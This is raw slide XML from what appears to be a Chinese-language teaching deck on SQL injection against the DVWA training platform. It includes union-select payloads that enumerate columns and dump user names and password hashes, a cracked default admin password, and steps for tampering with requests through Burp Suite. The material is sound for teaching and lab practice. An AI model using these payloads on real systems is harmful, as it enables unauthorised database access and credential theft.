              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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（4）获取表中的字段名</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10668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350" checksum="2733040107"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select column_name,2 from information_schema.columns where table_name='users' #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"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从显示结果可以推断：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>user</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字段和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>password</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字段为存放管理员账号和密码。</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31"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3906000" y="2974975"/>
            <a:ext cx="4388485" cy="3207385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1350000"/>
            <a:ext cx="11016000" cy="4948555"/>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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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获取DVWA平台的用户名和密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>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5</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）获得用户名和密码</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a:p>
            <a:pPr indent="10668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350" checksum="2733040107"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select user,password from users #</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从显示结果可知，用户名是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin</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，密码是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5f4dcc3b5aa765d61d8327deb882cf99</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2147482592"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3247200" y="2559050"/>
            <a:ext cx="5706745" cy="3274060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="399600"/>
            <a:ext cx="1080000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720090" y="1350010"/>
            <a:ext cx="11029950" cy="4738370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取DVWA平台的用户名和密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800" algn="l" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="100" checksum="3588401361"/>
                </a:ext>
              </a:extLst>
            </a:pP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）在线破解加密</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5f4dcc3b5aa765d61d8327deb882cf99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密的密文，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.cmd5.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在线解密工具。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a: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0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>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dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显然，</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DVWA平台默认用户名</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admin</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的密码是</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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376000" y="2971165"/>
            <a:ext cx="7451725" cy="2519680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="399600"/>
            <a:ext cx="10812780" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务实施一：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ow级别的SQL注入利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200">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17860" cy="8839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0" checksum="3407529306"/>
                </a:ext>
              </a:extLs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）查看源代码</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3" name="图片 63"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402000" y="2186305"/>
            <a:ext cx="5400000" cy="4380041"/>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00000" cy="514096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）查看源代码</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10668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350" checksum="2733040107"/>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第5行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$id = $_POST[ 'id' ];</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="10668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350" checksum="2733040107"/>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第7行：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F05020202040302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函数，对字符串中的特殊符号（“\x00”、“\n”、“\r”、“\”、“'”、“"”、“\x1a”）进行转义。</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10668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350" checksum="2733040107"/>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第9行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = $id;</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10668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350" checksum="2733040107"/>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第10行：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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函数，执行SQL语句操作。</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10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可见，源代码只是对特殊符号进行转义。</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10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通过对第</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9</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行</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SELECT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语句的分析，我们构造一个数字型注入值：“1 or 1”，判断此处是否为SQL注入点。</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10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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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65798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前端页面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采用下拉列表框，我们不能直接注入，可采用Burp Suite工具进行拦截修改，实现SQL注入攻击。</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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2322000" y="2933700"/>
            <a:ext cx="7560000" cy="3804814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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30429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仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</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altLang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>切换到Burp Suite，设置“Intercept is on”模式，即开启拦截抓包</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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2682000" y="2640330"/>
            <a:ext cx="6840000" cy="3725037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>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0" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880745" y="1884680"/>
            <a:ext cx="10548620" cy="4728845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一、AWVS</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AWVS，全称是Acunetix Web Vulnerability Scanner，是一款知名的网络漏洞扫描工具，它</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>通过网络爬虫测试你的网站安全，检</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测流行安全漏洞。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二、OWASP-ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简称：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ZAP）</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="457200" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OWASP-ZAP，全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
